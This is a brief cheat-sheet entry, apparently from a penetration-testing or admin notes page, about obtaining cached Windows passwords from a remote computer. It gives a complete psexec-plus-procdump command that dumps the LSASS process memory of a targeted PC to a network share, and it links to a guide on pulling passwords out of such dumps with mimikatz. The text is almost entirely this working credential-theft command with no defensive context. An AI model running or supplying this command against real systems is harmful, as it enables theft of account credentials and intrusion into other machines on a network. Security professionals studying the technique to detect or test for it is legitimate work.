Outputting memory dump of Windows security sessions. (Obtaining passwords stored locally in cache). This can be run against a remote system to obtain password credential information. This requires “local administrator” rights on the remote PC being targeted.
psexec \\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\server\logs\computername.log
Reference: https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/